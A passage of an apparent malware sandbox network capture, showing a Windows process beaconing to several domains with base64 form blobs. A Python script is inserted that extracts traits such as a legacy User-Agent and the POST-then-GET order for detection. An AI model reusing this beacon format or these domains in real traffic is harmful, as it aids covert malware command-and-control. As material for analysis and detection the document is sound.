    Data Raw: 74 70 54 64 3d 58 2b 34 4b 50 56 34 76 6a 79 46 4e 38 78 62 6b 54 42 42 76 66 61 47 30 45 49 6b 6e 64 2f 54 2b 36 61 33 78 6c 41 75 77 76 4c 75 41 45 77 4c 4f 78 68 4b 76 32 6c 64 57 37 2b 2f 77 34 50 58 4e 32 57 7a 50 45 48 51 62 76 77 73 79 72 62 42 67 64 67 66 31 33 43 52 70 69 68 66 4f 6a 63 46 61 78 55 7a 4d 49 35 7a 4a 56 6c 75 33 69 67 5a 47 54 65 31 43 34 69 71 39 56 5a 6a 5a 73 6a 55 78 2f 6a 50 59 71 6b 52 32 57 2b 44 37 4c 52 54 66 57 79 4f 6a 76 35 6a 4b 48 77 4c 53 46 6d 77 46 72 6d 70 6c 4a 31 6b 6c 51 38 6d 4f 38 49 62 33 4e 56 59 53 47 43 37 4b 73 37 46 79 63 76 37 73 54 33 59 33 33 55 76 75 42 2b 43 51 77 59 76 2f 65 76 62 76 44 54 6a 5a 57 54 54 7a 71 39 4e 30 64 6e 59 6b 4d 34 31 52 64 2b 37 53 5a 68 2f 44 62 77 47 73 57 64 41 36 70 4b 52 34 4f 76 36 48 75 68 63 53 67 76 65 4e 75 2f 73 41 31 72 4f 36 30 64 34 38 47 54 78 6e 66 41 6b 59 2f 70 6e 78 5a 30 6c 41 48 5a 48 43 4b 65 46 52 42 6f 36 42 62 2f 63 59 4b 30 2b 36 6e 66 4c 32 51 33 30 75 63 37 50 39 35 34 31 31 79 34 56 6b 2f [TRUNCATED]
    Data Ascii: tpTd= [TRUNCATED]


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
32          192.168.2.9  60847        156.242.132.82  80                1432  C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe

Timestamp                            Bytes transferred  Direction  Data
Oct 8, 2024 15:35:43.033276081 CEST  476                OUT        GET /b6g5/?tpTd=a8QqMioE13Jt2iPiOClkfJLiI6soJM7xy7KAtya8ruOCNgqe2jC0xyltzPPw7ePD7gDMaG5P8Bx9i7otBFrSmSNv5WmdoflN7m2YOZj8dE3cyj5SIw==&WX=rnWllP5PLlhLLtj HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
    Accept-Language: en-US,en;q=0.9
    Host: www.shanhaiguan.net
    Connection: close
    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
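The requests to each contacted domain follow one shape: form-encoded POSTs to a short path, each carrying a single key (tpTd) with an opaque blob, then a GET to the same path with the blob in the query string. Every request uses the same Chrome/40 User-Agent on "Windows NT 6.3", sends Connection: close, and on the POSTs sets Origin to the bare host and Referer to the POST target itself. The script below is an added example, not part of the Joe Sandbox report and not a vendor signature: it reassembles session 30 and session 32 from this dump, pulls out those traits, and checks the per-host request order for sessions 30 to 36. The indicator names, the ordering rule and the "a real browser always sends Accept-Encoding" heuristic are this example's own assumptions.

```python
"""Triage of the HTTP check-ins in sessions 30-36 of the dump above.
Added example, not part of the Joe Sandbox report and not a vendor signature:
requests copied from sessions 30 and 32, session table from sessions 30-36;
indicator names and the per-host ordering rule are this example's own assumptions."""
import re
from urllib.parse import urlsplit

LEGACY_UA = "Chrome/40.0.2214.38"            # User-Agent seen in every request above
BLOB = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")  # base64 alphabet, optional padding
UA = ("Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 "
      "(KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36")
ACCEPT = ("text/html,application/xhtml+xml,application/xml;q=0.9,"
          "image/avif,image/webp,image/apng,*/*;q=0.8")

# Session 30 (POST, Content-Length 217), headers and body copied from the dump.
SESSION_30 = (
    "POST /b6g5/ HTTP/1.1\r\n"
    f"Accept: {ACCEPT}\r\nAccept-Encoding: gzip, deflate, br\r\n"
    "Accept-Language: en-US,en;q=0.9\r\nHost: www.shanhaiguan.net\r\n"
    "Origin: http://www.shanhaiguan.net\r\nCache-Control: max-age=0\r\n"
    "Content-Length: 217\r\nConnection: close\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    f"Referer: http://www.shanhaiguan.net/b6g5/\r\nUser-Agent: {UA}\r\n\r\n"
    "tpTd=X+4KPV4vjyFN8xbkTBBvfaG0EIknd/T+6a3xlAuwvLmAEDDOg2Wv3ldW4+/94PWR2WrLEHdsvzUy6J5g"
    "JEL1tSRppBfNs8FDxUjAI5jJVlu3im1GULBC+iq+SZjFojVs/jHuqllMDej7LxDfagmjn5jIEwLwFm9F"
    "rm0aJ1QcQ7iOt+qTbXU3FgHNtM5yVaLYRj80o2n/QLCB176rIQ=="
)
# Session 32 (the GET that follows the POSTs to the same path), copied likewise.
SESSION_32 = (
    "GET /b6g5/?tpTd=a8QqMioE13Jt2iPiOClkfJLiI6soJM7xy7KAtya8ruOCNgqe2jC0xyltzPPw7ePD7gDMaG5P"
    "8Bx9i7otBFrSmSNv5WmdoflN7m2YOZj8dE3cyj5SIw==&WX=rnWllP5PLlhLLtj HTTP/1.1\r\n"
    f"Accept: {ACCEPT}\r\nAccept-Language: en-US,en;q=0.9\r\n"
    f"Host: www.shanhaiguan.net\r\nConnection: close\r\nUser-Agent: {UA}\r\n\r\n"
)
# (session, host, method, path) summarised from sessions 30-36 of the dump.
SESSIONS = [
    (30, "www.shanhaiguan.net", "POST", "/b6g5/"),
    (31, "www.shanhaiguan.net", "POST", "/b6g5/"),
    (32, "www.shanhaiguan.net", "GET", "/b6g5/"),
    (33, "www.es-lidl.online", "POST", "/n2dv/"),
    (34, "www.es-lidl.online", "POST", "/n2dv/"),
    (35, "www.es-lidl.online", "POST", "/n2dv/"),
    (36, "www.es-lidl.online", "GET", "/n2dv/"),
]


def parse_request(raw):
    """Split one raw HTTP/1.1 request into method, path, query, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    return {"method": method, "path": parts.path, "query": parts.query,
            "headers": headers, "body": body}


def split_pairs(encoded):
    """key=value pairs split by hand: the blob is not percent-encoded, so
    urllib.parse.parse_qs would turn every '+' inside it into a space."""
    pairs = []
    for item in encoded.split("&"):
        if item:
            key, _, value = item.partition("=")
            pairs.append((key, value))
    return pairs


def indicators(req):
    """Traits this request shares with the dump above (heuristics, not a signature)."""
    h, found = req["headers"], []
    host = h.get("host", "")
    if LEGACY_UA in h.get("user-agent", ""):
        found.append("legacy-chrome-ua")
    if h.get("connection", "").lower() == "close":
        found.append("connection-close")
    if req["method"] == "POST":
        # Origin is the bare host and Referer is the POST target itself: the
        # request claims to come from the very page it is posting to.
        if (h.get("origin") == f"http://{host}"
                and h.get("referer") == f"http://{host}{req['path']}"):
            found.append("self-referring-origin")
        if int(h.get("content-length", "0")) != len(req["body"].encode()):
            found.append("content-length-mismatch")
        pairs = split_pairs(req["body"])
    else:
        if "accept-encoding" not in h:  # assumption: a real browser always sends it
            found.append("missing-accept-encoding")
        pairs = split_pairs(req["query"])
    if pairs and BLOB.match(pairs[0][1]):
        found.append("opaque-blob:" + pairs[0][0])
    return found


def checkin_hosts(sessions):
    """Hosts that got one or more POSTs to a single path and then a GET to that
    same path, the order both domains in the dump show."""
    by_host = {}
    for _sid, host, method, path in sorted(sessions):
        by_host.setdefault(host, []).append((method, path))
    hits = []
    for host, seq in by_host.items():
        methods = [m for m, _p in seq]
        if len({p for _m, p in seq}) == 1 and "POST" in methods and methods[-1] == "GET":
            hits.append(host)
    return sorted(hits)


if __name__ == "__main__":
    print(indicators(parse_request(SESSION_30)), checkin_hosts(SESSIONS))
```

Two points worth keeping in mind when turning this into a detection: the form key, path and the WX value are strings of this sample (the same tpTd key and the same WX=rnWllP5PLlhLLtj appear on both domains here, but nothing on this page says they are stable across builds), so the structural traits are the safer pivot; and the payload must be read without a form parser that decodes '+' as space, or the blob is altered before it is ever inspected.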


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
33          192.168.2.9  60848        84.32.84.32     80                1432  C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe

Timestamp                            Bytes transferred  Direction  Data
Oct 8, 2024 15:36:17.746534109 CEST  737                OUT        POST /n2dv/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    Host: www.es-lidl.online
    Origin: http://www.es-lidl.online
    Cache-Control: max-age=0
    Content-Length: 193
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Referer: http://www.es-lidl.online/n2dv/
    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
    Data Raw: 74 70 54 64 3d 57 4d 77 50 58 6b 67 50 2f 35 70 36 57 43 2f 4b 6c 76 75 78 4b 4d 31 4a 7a 39 51 77 4c 47 41 68 32 35 62 42 51 4c 4e 5a 54 55 6b 69 6c 51 35 4f 4a 41 55 32 31 33 4b 59 50 30 62 78 71 79 37 58 4d 52 2b 43 64 67 77 79 46 66 30 61 69 4a 44 71 79 74 30 6d 68 63 4c 51 2f 65 56 42 47 64 4f 63 47 36 57 53 70 5a 2b 66 61 4c 68 63 35 58 4c 47 70 4d 59 57 7a 30 76 4b 76 39 36 34 37 74 33 4f 32 42 6a 4e 6e 2b 4d 78 6d 65 2f 76 66 44 69 76 37 42 6d 68 6f 61 64 39 42 76 44 71 65 4f 6e 6f 56 6e 68 6c 61 61 2f 43 51 5a 5a 30 39 2b 47 32 4f 30 6a 67 67 37 42 76 75 71 43 68
    Data Ascii: tpTd=WMwPXkgP/5p6WC/KlvuxKM1Jz9QwLGAh25bBQLNZTUkilQ5OJAU213KYP0bxqy7XMR+CdgwyFf0aiJDqyt0mhcLQ/eVBGdOcG6WSpZ+faLhc5XLGpMYWz0vKv9647t3O2BjNn+Mxme/vfDiv7Bmhoad9BvDqeOnoVnhlaa/CQZZ09+G2O0jgg7BvuqCh


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
34          192.168.2.9  60849        84.32.84.32     80                1432  C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe

Timestamp                            Bytes transferred  Direction  Data
Oct 8, 2024 15:36:20.289485931 CEST  761                OUT        POST /n2dv/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    Host: www.es-lidl.online
    Origin: http://www.es-lidl.online
    Cache-Control: max-age=0
    Content-Length: 217
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Referer: http://www.es-lidl.online/n2dv/
    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
    Data Raw: 74 70 54 64 3d 57 4d 77 50 58 6b 67 50 2f 35 70 36 45 53 50 4b 6a 4f 75 78 4e 73 31 4b 32 39 51 77 51 57 41 6c 32 35 48 42 51 4f 30 43 53 69 55 69 6c 78 4a 4f 62 31 30 32 32 33 4b 59 45 55 62 77 30 43 37 63 4d 52 6a 33 64 69 6b 79 46 62 6b 61 69 4a 7a 71 7a 65 4d 68 6e 4d 4c 57 7a 2b 56 35 62 74 4f 63 47 36 57 53 70 5a 36 68 61 4c 35 63 35 6e 58 47 71 75 67 52 2b 55 75 34 2f 4e 36 34 77 4e 33 43 32 42 6a 56 6e 39 49 49 6d 63 48 76 66 48 71 76 37 54 4f 75 69 61 63 34 46 76 44 31 52 4f 69 77 5a 32 39 33 63 4a 6e 59 51 6f 4a 50 7a 2f 6d 6f 66 47 71 37 31 73 42 49 70 4e 4c 4a 56 39 4d 52 44 76 6e 76 42 4c 62 32 32 49 6e 61 6a 30 64 57 67 41 3d 3d
    Data Ascii: tpTd=WMwPXkgP/5p6ESPKjOuxNs1K29QwQWAl25HBQO0CSiUilxJOb10223KYEUbw0C7cMRj3dikyFbkaiJzqzeMhnMLWz+V5btOcG6WSpZ6haL5c5nXGqugR+Uu4/N64wN3C2BjVn9IImcHvfHqv7TOuiac4FvD1ROiwZ293cJnYQoJPz/mofGq71sBIpNLJV9MRDvnvBLb22Inaj0dWgA==


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
35          192.168.2.9  60850        84.32.84.32     80                1432  C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe

Timestamp                            Bytes transferred  Direction  Data
Oct 8, 2024 15:36:22.838145971 CEST  1774               OUT        POST /n2dv/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    Host: www.es-lidl.online
    Origin: http://www.es-lidl.online
    Cache-Control: max-age=0
    Content-Length: 1229
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Referer: http://www.es-lidl.online/n2dv/
    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
    Data Raw: 74 70 54 64 3d 57 4d 77 50 58 6b 67 50 2f 35 70 36 45 53 50 4b 6a 4f 75 78 4e 73 31 4b 32 39 51 77 51 57 41 6c 32 35 48 42 51 4f 30 43 53 68 30 69 6b 44 42 4f 4a 6b 30 32 33 33 4b 59 4e 30 62 39 30 43 37 42 4d 52 72 7a 64 69 59 49 46 5a 73 61 69 71 4c 71 30 76 4d 68 75 4d 4c 57 75 75 56 43 47 64 4f 4e 47 36 47 57 70 5a 4b 68 61 4c 35 63 35 6d 6e 47 39 73 59 52 74 45 76 4b 76 39 36 38 37 74 33 6d 32 42 62 72 6e 2b 6b 59 6e 76 50 76 52 47 57 76 34 67 6d 75 2f 71 63 36 43 76 43 67 52 50 65 52 5a 32 68 4b 63 49 6a 2b 51 76 46 50 78 59 50 4e 4c 6b 79 57 73 65 35 55 6a 75 6a 6d 4d 59 51 77 46 39 65 53 44 4c 7a 35 33 6f 36 46 6f 6e 77 67 37 46 31 51 44 52 63 53 2f 4b 52 6c 4a 30 58 33 62 69 44 43 51 37 47 78 79 6f 63 52 62 63 47 5a 30 68 43 4a 47 6a 52 2b 4a 32 6e 47 75 31 77 71 43 42 39 6d 79 34 4b 61 73 4a 57 54 66 55 66 6f 65 51 34 6d 77 4f 34 2f 38 57 78 77 32 34 57 32 43 67 6d 55 6c 49 6f 63 4b 53 38 5a 58 6e 76 49 48 68 38 30 78 34 34 44 48 6d 76 74 43 6a 68 59 30 51 4e 67 62 38 31 49 32 56 35 57 67 [TRUNCATED]
    Data Ascii: tpTd= [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.9 | 60851 | 84.32.84.32 | 80 | 1432 | C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:36:25.378170967 CEST | 475 | OUT | GET /n2dv/?tpTd=bOYvUT8qr4FCBQL4q+W2EOsk7MURICY42o+fYfsEfk4vvxNQfURJ5XqGAnjP2wivb2XfCAEuS6lNjanH3pgkh9rgu/pEJ/+PKIa4gq6/Dbg2n2byoA==&WX=rnWllP5PLlhLLtj HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Host: www.es-lidl.online
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
Oct 8, 2024 15:36:25.860763073 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: hcdn
Date: Tue, 08 Oct 2024 13:36:25 GMT
Content-Type: text/html
Content-Length: 10072
Connection: close
Vary: Accept-Encoding
alt-svc: h3=":443"; ma=86400
x-hcdn-request-id: 588b82f8782d10ed1e8522cb380a3e32-bos-edge1
Expires: Tue, 08 Oct 2024 13:36:24 GMT
Cache-Control: no-cache
Accept-Ranges: bytes
Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"
Oct 8, 2024 15:36:25.860809088 CEST | 224 | IN | Data Raw: 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61
Data Ascii: Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:3
Oct 8, 2024 15:36:25.860832930 CEST | 1236 | IN | Data Raw: 30 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 21 69 6d 70 6f 72 74 61 6e 74 3b 63 6f 6c 6f 72 3a 23 33 33 33 7d 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 7d 68 33 7b 66 6f 6e 74
Data Ascii: 0px;font-weight:600!important;color:#333}h2{font-size:24px;font-weight:600}h3{font-size:22px;font-weight:600;line-height:28px}hr{margin-top:35px;margin-bottom:35px;border:0;border-top:1px solid #bfbebe}ul{list-style-type:none;margin:0;padding:
Oct 8, 2024 15:36:25.860857010 CEST | 1236 | IN | Data Raw: 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 74 6f 70 2d 63 6f 6e 74 61 69 6e 65 72 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 7d 2e 6d 65 73 73 61 67 65 2d 73 75 62 74 69 74 6c 65 7b 63 6f 6c 6f
Data Ascii: align:center}.top-container{display:flex;flex-direction:row}.message-subtitle{color:#2f1c6a;font-weight:700;font-size:24px;line-height:32px;margin-bottom:16px}.message{width:60%;height:auto;padding:40px 0;align-items:baseline;border-radius:5px
Oct 8, 2024 15:36:25.860876083 CEST | 1236 | IN | Data Raw: 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 3a 34 70 78 20 38 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37
Data Ascii: -align:middle;text-align:center;display:inline-block;padding:4px 8px;font-weight:700;border-radius:4px;background-color:#fc5185}@media screen and (max-width:768px){.message{width:100%;padding:35px 0}.container{margin-top:30px}.navbar-links{dis
Oct 8, 2024 15:36:25.860898972 CEST | 1236 | IN | Data Raw: 66 6f 6c 6c 6f 77 3e 3c 69 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 74 72 75 65 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 67 72 61 64 75 61 74 69 6f 6e 2d 63 61 70 22 3e 3c 2f 69 3e 20 54 75 74 6f 72 69 61 6c 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c
Data Ascii: follow><i aria-hidden=true class="fas fa-graduation-cap"></i> Tutorials</a></li><li><a href=https://support.hostinger.com/en/ rel=nofollow><i aria-hidden=true class="fa-readme fab"></i>Knowledge base</a></li><li><a href=https://www.hostinger.c
Oct 8, 2024 15:36:25.860920906 CEST | 1236 | IN | Data Raw: 6c 79 20 66 61 73 74 2c 20 73 65 63 75 72 65 20 61 6e 64 20 75 73 65 72 2d 66 72 69 65 6e 64 6c 79 20 77 65 62 73 69 74 65 20 68 6f 73 74 69 6e 67 20 66 6f 72 20 79 6f 75 72 20 73 75 63 63 65 73 73 66 75 6c 20 6f 6e 6c 69 6e 65 20 70 72 6f 6a 65
Data Ascii: ly fast, secure and user-friendly website hosting for your successful online projects.</p><br><a href=https://www.hostinger.com rel=nofollow>Find your hosting plan</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=co
Oct 8, 2024 15:36:25.861382008 CEST | 1236 | IN | Data Raw: 73 65 71 75 65 6e 63 65 22 29 3b 72 3d 28 28 31 30 32 33 26 72 29 3c 3c 31 30 29 2b 28 31 30 32 33 26 65 29 2b 36 35 35 33 36 7d 6e 2e 70 75 73 68 28 72 29 7d 72 65 74 75 72 6e 20 6e 7d 2c 65 6e 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 6f 29 7b
Data Ascii: sequence");r=((1023&r)<<10)+(1023&e)+65536}n.push(r)}return n},encode:function(o){for(var r,e=[],n=0,t=o.length;n<t;){if(55296==(63488&(r=o[n++])))throw new RangeError("UTF-16(encode): Illegal UTF-16 value");65535<r&&(r-=65536,e.push(String.fr
Oct 8, 2024 15:36:25.861398935 CEST | 776 | IN | Data Raw: 6c 65 6e 67 74 68 2b 31 2c 30 3d 3d 3d 6c 29 2c 4d 61 74 68 2e 66 6c 6f 6f 72 28 66 2f 68 29 3e 72 2d 61 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e 79 63 6f 64 65 5f 6f 76 65 72 66 6c 6f 77 28 33 29 22 29 3b 61 2b 3d 4d 61
Data Ascii: length+1,0===l),Math.floor(f/h)>r-a)throw RangeError("punycode_overflow(3)");a+=Math.floor(f/h),f%=h,t&&y.splice(f,0,e.charCodeAt(d-1)-65<26),m.splice(f,0,a),f++}if(t)for(f=0,w=m.length;f<w;f++)y[f]&&(m[f]=String.fromCharCode(m[f]).toUpperCase
Oct 8, 2024 15:36:25.861428976 CEST | 760 | IN | Data Raw: 64 3d 30 3b 64 3c 76 3b 2b 2b 64 29 7b 69 66 28 28 43 3d 74 5b 64 5d 29 3c 68 26 26 2b 2b 66 3e 72 29 72 65 74 75 72 6e 20 45 72 72 6f 72 28 22 70 75 6e 79 63 6f 64 65 5f 6f 76 65 72 66 6c 6f 77 28 32 29 22 29 3b 69 66 28 43 3d 3d 68 29 7b 66 6f
Data Ascii: d=0;d<v;++d){if((C=t[d])<h&&++f>r)return Error("punycode_overflow(2)");if(C==h){for(p=f,g=o;!(p<(s=g<=u?1:u+26<=g?26:g-u));g+=o)y.push(String.fromCharCode(e(s+(p-s)%(o-s),0))),p=Math.floor((p-s)/(o-s));y.push(String.fromCharCode(e(p,a&&w[d]?1:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.9 | 60852 | 3.91.127.116 | 80 | 1432 | C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:36:31.364955902 CEST | 719 | OUT | POST /eoqq/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.wajf.net
Origin: http://www.wajf.net
Cache-Control: max-age=0
Content-Length: 193
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.wajf.net/eoqq/
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
Data Raw: 74 70 54 64 3d 62 64 79 74 34 6e 39 61 44 55 49 66 6d 45 35 36 37 76 6f 49 4f 63 68 32 52 5a 55 7a 41 54 42 77 74 74 74 34 73 66 70 31 41 43 56 4d 6e 53 32 50 71 6d 36 37 67 39 35 33 35 52 64 49 73 5a 6f 7a 58 36 43 4d 46 38 6e 4f 78 59 73 48 70 7a 31 68 2f 68 49 68 46 57 7a 74 6f 6c 6f 63 4d 67 73 51 45 62 41 2b 69 75 74 38 55 53 34 41 6c 38 51 64 77 41 64 57 44 6c 6f 67 44 74 43 4d 34 45 73 6f 6b 6f 79 78 35 6f 6a 76 74 69 71 45 76 43 72 35 63 4f 56 31 4e 59 4f 6d 79 59 63 6f 69 78 64 5a 4c 33 59 64 4a 6a 62 43 79 78 4f 55 76 71 7a 6f 34 5a 39 7a 6a 48 6b 4a 6e 55 78 2b
Data Ascii: tpTd=bdyt4n9aDUIfmE567voIOch2RZUzATBwttt4sfp1ACVMnS2Pqm67g9535RdIsZozX6CMF8nOxYsHpz1h/hIhFWztolocMgsQEbA+iut8US4Al8QdwAdWDlogDtCM4Esokoyx5ojvtiqEvCr5cOV1NYOmyYcoixdZL3YdJjbCyxOUvqzo4Z9zjHkJnUx+
Oct 8, 2024 15:36:31.833496094 CEST | 1236 | IN | HTTP/1.1 200 OK
Date: Tue, 08 Oct 2024 13:36:31 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Data Raw: 33 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 61 6d 65 42 72 69 67 68 74 20 2d 20 43 6f 6d 69 6e 67 20 53 6f 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 2c 20 64 69 76 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 